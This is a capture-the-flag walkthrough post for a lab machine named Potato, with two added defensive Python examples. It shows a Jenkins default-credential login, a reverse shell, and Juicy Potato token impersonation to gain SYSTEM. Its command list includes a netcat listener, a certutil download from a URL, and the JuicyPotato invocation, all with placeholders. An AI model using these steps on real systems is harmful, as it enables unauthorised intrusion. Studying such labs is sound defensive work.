Premise

In this walkthrough post, we go over one of the machines on CyberSecLabs that goes by the name Potato. We found default credentials on the Jenkins server that allowed us to establish access to the Windows system, and we escalated our privileges with token impersonation.

Machine Name: Potato

Difficulty: Medium

Skills Learned

  • Jenkins Software
  • Windows Privilege Escalation
  • Token Impersonation
  • OSCP

Finding a Way In: Reconnaissance

First things first, I needed to see what I was working with. After connecting to the lab’s network, I ran a network scan to find any open doors.

I discovered a web server running on an unusual port, which immediately caught my attention. It turned out to be a Jenkins login page. Jenkins is a popular tool for automating software development, and finding it exposed is often a good sign for an attacker.

Getting a Foothold: The Jenkins Exploit

Here’s where things got interesting. I tried some common default credentials, and to my surprise, admin:admin worked! This is a classic mistake and a great reminder of why you should always change default passwords.

Once I was logged into Jenkins, I knew I could run commands on the system. I decided to use a Groovy script to create a reverse shell. This means the target machine will connect back to my computer, giving me a command-line interface to work with. After a bit of troubleshooting, I successfully got a shell on the Windows machine.

I also showed another way to run commands using PowerShell directly through Jenkins. I ran a command to check my user’s privileges and found that I had some special permissions, specifically one called SeImpersonatePrivilege, which is a well-known stepping stone for privilege escalation on Windows.
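From the defender's side, the foothold described above has a recognisable shape: shells started from a Jenkins build step or the script console show up as child processes of the Jenkins JVM. The following is an added detection example, not code from the post or from the Jenkins project; it runs over a few constructed process-creation records whose field names (Image, ParentImage, ParentCommandLine, User) are assumptions loosely modelled on Sysmon process-creation events.

```python
"""Flag command interpreters spawned by the Jenkins JVM.

Added example for this walkthrough; the event records below are constructed
and the field names are an assumption, not a real log schema.
"""
from typing import Dict, List

# Interpreters whose appearance under the Jenkins JVM deserves a look.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed sample events. The first two mimic a shell launched from a
# build step or the script console; the last two are benign controls.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Java\jre1.8.0\bin\java.exe",
        "ParentCommandLine": "java -jar jenkins.war --httpPort=8080",
        "User": r"POTATO\jenkins",
    },
    {
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Program Files\Java\jre1.8.0\bin\java.exe",
        "ParentCommandLine": "java -jar jenkins.war --httpPort=8080",
        "User": r"POTATO\jenkins",
    },
    {   # benign: Jenkins running git for a checkout
        "Image": r"C:\Program Files\Git\bin\git.exe",
        "ParentImage": r"C:\Program Files\Java\jre1.8.0\bin\java.exe",
        "ParentCommandLine": "java -jar jenkins.war --httpPort=8080",
        "User": r"POTATO\jenkins",
    },
    {   # benign: an interactive PowerShell started from Explorer
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\explorer.exe",
        "User": r"POTATO\alice",
    },
]


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased (works on any host OS)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_jenkins_jvm(ev: Dict[str, str]) -> bool:
    """Parent is a Java process whose command line references jenkins."""
    return (basename(ev["ParentImage"]) in {"java.exe", "javaw.exe"}
            and "jenkins" in ev["ParentCommandLine"].lower())


def spawns_interpreter(ev: Dict[str, str]) -> bool:
    return basename(ev["Image"]) in INTERPRETERS


def find_jenkins_shells(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return every event where the Jenkins JVM started a command interpreter."""
    return [ev for ev in events if is_jenkins_jvm(ev) and spawns_interpreter(ev)]


def summarize(events: List[Dict[str, str]]) -> List[str]:
    """One human-readable line per finding: user : parent -> child."""
    return [f"{ev['User']} : {basename(ev['ParentImage'])} -> {basename(ev['Image'])}"
            for ev in find_jenkins_shells(events)]


if __name__ == "__main__":
    for line in summarize(SAMPLE_EVENTS):
        print(line)
```

Legitimate pipelines do run bat and PowerShell steps, so in a real deployment this rule needs an allowlist of expected build-step command lines; the point is that an interpreter under the Jenkins JVM that no job explains, especially one that opens an outbound connection, is the event to alert on.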

Becoming the Admin: Privilege Escalation with Juicy Potato

My final goal was to become the “SYSTEM” user, which is the highest level of privilege on a Windows machine.

I gathered some system information and confirmed that the SeImpersonatePrivilege was my key to moving up. For this, I chose a well-known tool called Juicy Potato.
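The privilege check in the two passages above (the whoami /priv output in the Jenkins section and its confirmation here) is also the audit a defender should run on every service account. The following is an added example, not code from the post: it parses the text format that whoami /priv prints and flags the privileges that make token impersonation possible. The sample output is constructed, and the two-entry high-risk list is an assumption standing in for a site's own policy.

```python
"""Audit whoami /priv output for privileges that enable token impersonation.

Added example for this walkthrough. SAMPLE_WHOAMI_PRIV is constructed and
HIGH_RISK_PRIVILEGES is an assumed policy list, not a Windows-defined set.
"""
import re
from typing import Dict, List, Tuple

# Privileges that let a low-privileged account reach SYSTEM via impersonation.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate a client after authentication",
    "SeAssignPrimaryTokenPrivilege": "replace a process level token",
}

# Constructed sample of what whoami /priv prints for a service account.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One table row: privilege name, free-text description, then the state column.
PRIV_ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)$")


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Return {privilege_name: state} for every row of the privileges table."""
    privs: Dict[str, str] = {}
    for raw in text.splitlines():
        m = PRIV_ROW.match(raw.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def high_risk_present(privs: Dict[str, str]) -> List[Tuple[str, str]]:
    """High-risk privileges held by the token, with their state.

    Presence is what matters: a process can enable a privilege it holds even
    when whoami reports it as Disabled, so Disabled is not a pass.
    """
    return sorted((name, state) for name, state in privs.items()
                  if name in HIGH_RISK_PRIVILEGES)


def audit_report(text: str) -> List[str]:
    """Human-readable findings for the given whoami /priv output."""
    return [f"{name} ({state}): {HIGH_RISK_PRIVILEGES[name]}"
            for name, state in high_risk_present(parse_whoami_priv(text))]


if __name__ == "__main__":
    for finding in audit_report(SAMPLE_WHOAMI_PRIV):
        print(finding)
```

The mitigation this points at is the usual one: run services such as Jenkins under an account that does not hold these privileges, or under a virtual or managed service account whose token is scoped to what the service needs.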

I downloaded the Juicy Potato tool and transferred it over to the target machine. I also needed a way to catch the new, more powerful shell, so I transferred a version of Netcat (a networking utility) as well. I created a small script that would use Netcat to send a shell back to my computer.

I then ran Juicy Potato, telling it to execute my script. Although the lab machine crashed at the very end (which can sometimes happen with online labs), I explained that the method itself is solid and would typically result in a full SYSTEM-level shell.

Commands I Used

Here are the technical commands I used in the terminal during the demonstration:

  • nmap -sV [IP Address]
  • sudo nc -lvp [port]
  • ifconfig
  • clear
  • whoami /priv
  • sudo nano [filename]
  • sudo wget [URL]
  • cd /var/www/html
  • systeminfo
  • sudo mv [source] [destination]
  • certutil.exe -urlcache -f [URL] [output_filename]
  • echo [command] > [filename]
  • dir
  • JuicyPotato.exe -l [port] -p [program_to_execute] -t * -c [CLSID]

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
